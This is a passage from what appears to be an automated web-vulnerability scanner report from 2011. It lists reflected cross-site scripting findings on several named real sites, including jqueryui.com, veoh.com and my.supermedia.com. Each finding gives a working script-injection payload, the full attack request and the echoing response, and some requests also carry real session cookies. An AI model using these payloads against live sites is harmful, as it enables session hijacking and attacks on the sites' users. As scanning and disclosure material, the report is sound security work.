_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ip-adress.com%2fwhois%2fsmartdevil.com44a08%27%253b28a34fbd60c%2fx22
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad9c"><script>alert(1)</script>ce5a88a8f06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?2ad9c"><script>alert(1)</script>ce5a88a8f06=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 22:06:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&2ad9c"><script>alert(1)</script>ce5a88a8f06=1" type="text/css" media="all" />
...[SNIP]...

3.64. http://ll-appserver.veoh.com/styles/veoh-ie6.css [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /styles/veoh-ie6.css

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 714d6<script>alert(1)</script>a1c7f770126 was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/veoh-ie6.css?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126 HTTP/1.1
Host: ll-appserver.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.0.10.1296766388;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:30 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sat, 26 Jul 2030 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/css; charset: UTF-8
Connection: close

div.spacer{clear:both;line-height:0px;font-size:0px;height:60px}div.smallSpacer{clear:both;line-height:0px;font-size:0px;height:20px}div.tinySpacer{clear:both;line-height:0px;font-size:0px;height:8px}
...[SNIP]...
kenOut
li{border:0;border-right:1px solid #d7d7d7;background:none}#bodyLevelThumbTip_leftOf
.thumbMeta{background:transparent url(../images/hoverdetails_bg_shadow_right.png?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126) no-repeat scroll center bottom}#veohPage, #contentHolder_watchFull #playerBottomOuterWrapper,#commentLoginWrapper{background-color:#fff}#contentHolder_watchFull #watch-controls, div.chooseCat ul li a
...[SNIP]...

3.65. http://ll-appserver.veoh.com/styles/veoh.css [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /styles/veoh.css

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 88ebc<script>alert(1)</script>9e1cf63d45e was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/veoh.css?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e HTTP/1.1
Host: ll-appserver.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:41:45 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sat, 26 Jul 2030 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/css; charset: UTF-8
Connection: keep-alive
Content-Length: 98344

*{margin:0;padding:0}body{font:normal 12px "Lucida Grande", Tahoma, Arial, Helvetica, sans-serif;text-align:center;margin:0
auto;position:relative}.clear{clear:both;line-height:0px;font-size:0px}.clea
...[SNIP]...
:left;width:250px}.recaptcha_icons{margin-top:3px;float:right}.recaptcha_audio{display:block;width:25px;height:16px;background:transparent url(../images/recaptcha_audio.gif?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e) no-repeat top center}.recaptcha_text{display:block;width:25px;height:16px;background:transparent url(../images/recaptcha_text.gif?version=AFrontend.5.5.4.103888ebc<script>
...[SNIP]...

3.66. http://managedq.com/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f22"%3balert(1)//e219070d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 65f22";alert(1)//e219070d6eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=o/65f22"%3balert(1)//e219070d6ebbama HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13527
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascri
...[SNIP]...
r.estimatedResultCount)
//        searcher.cursor.estimatedResultCount
       }

   searchControl.setSearchCompleteCallback(this, OnSearchComplete);
// Execute an inital search
searchControl.execute("o/65f22";alert(1)//e219070d6ebbama");

   //search.gotoPage(3)
//    searchControl.execute("managedq");
}
google.setOnLoadCallback(OnLoad);

//setTimeout("alert(string)",4000)

//]]>
...[SNIP]...

3.67. http://managedq.com/search.php [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8e1"%3balert(1)//d33907aeb4e was submitted in the q parameter. This input was echoed as be8e1";alert(1)//d33907aeb4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=obamabe8e1"%3balert(1)//d33907aeb4e HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13526
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascri
...[SNIP]...
stimatedResultCount)
//        searcher.cursor.estimatedResultCount
       }

   searchControl.setSearchCompleteCallback(this, OnSearchComplete);
// Execute an inital search
searchControl.execute("obamabe8e1";alert(1)//d33907aeb4e");

   //search.gotoPage(3)
//    searchControl.execute("managedq");
}
google.setOnLoadCallback(OnLoad);

//setTimeout("alert(string)",4000)

//]]>
...[SNIP]...

3.68. http://my.supermedia.com/customersupport/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /customersupport/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33517"><script>alert(1)</script>270ee3472e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:30 GMT
Content-Length: 19431
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1&print=ed">
...[SNIP]...

3.69. http://my.supermedia.com/directoryoptout [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fe3"><script>alert(1)</script>84741f5cfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /directoryoptout?37fe3"><script>alert(1)</script>84741f5cfde=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:26 GMT
Pragma: no-cache
Content-Length: 24725
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NLD6RFdXPRTw2vwG1LgBrG7JnC27kyJ154JBgp4LL03M7ljcGhrz!-1173275059!-550558129; path=/
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:44:01 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3"><script>alert(1)</script>84741f5cfde=1&print=ed">
...[SNIP]...

3.70. http://my.supermedia.com/directoryoptout/ [37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8cf"><script>alert(1)</script>b83041eb0df was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:46:25 GMT
Pragma: no-cache
ntCoent-Length: 24682
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:54:01 GMT;path=/;httponly
Content-Length: 24682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df&print=ed">
...[SNIP]...

3.71. http://my.supermedia.com/directoryoptout/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87e3"><script>alert(1)</script>55222cbb99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1 HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:03 GMT
Pragma: no-cache
ntCoent-Length: 24688
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:39 GMT;path=/;httponly
Content-Length: 24688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1&print=ed">
...[SNIP]...

3.72. http://my.supermedia.com/directoryoptout/confirm.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/confirm.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319e1"><script>alert(1)</script>a37efd293c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/confirm.do?319e1"><script>alert(1)</script>a37efd293c2=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:32 GMT
Pragma: no-cache
Content-Length: 25076
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:08 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?319e1"><script>alert(1)</script>a37efd293c2=1&print=ed">
...[SNIP]...

3.73. http://my.supermedia.com/directoryoptout/index.jsp [37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/index.jsp

Issue detail

The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1233c"><script>alert(1)</script>6337a742d73 was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:24 GMT
Pragma: no-cache
Content-Length: 24636
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:59 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73&print=ed">
...[SNIP]...

3.74. http://my.supermedia.com/directoryoptout/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb13"><script>alert(1)</script>0d37311fbea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:31 GMT
Pragma: no-cache
Content-Length: 24551
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1&print=ed">
...[SNIP]...

3.75. http://trc.taboolasyndication.com/dispatch/ [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload c34fc<script>alert(1)</script>1395c3bee03 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=jsonc34fc<script>alert(1)</script>1395c3bee03&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml
Date: Thu, 03 Feb 2011 21:44:41 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a72418f5-7573-4033-a20c-768665ba4c71;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_session_id_veoh=v1_7d4cc60fd932dcc7937c149c3cdf9f52_a72418f5-7573-4033-a20c-768665ba4c71_1296769481_1296769481;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_rii_veoh=1039225080754099931_5874168958137325309;Path=/;Expires=Fri, 03-Feb-12 21:44:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4107

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 serializer id "jsonc34fc&lt;script&gt;alert(1)&lt;/script&gt;1395c3bee03" is not configured. se
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFRequestException: serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.selectSerializer(RecommendationClientAda
...[SNIP]...

3.76. http://trc.taboolasyndication.com/dispatch/ [item-type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the item-type request parameter is copied into the HTML document as plain text between tags. The payload 93a54<script>alert(1)</script>e2384cd3dfb was submitted in the item-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video93a54<script>alert(1)</script>e2384cd3dfb&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

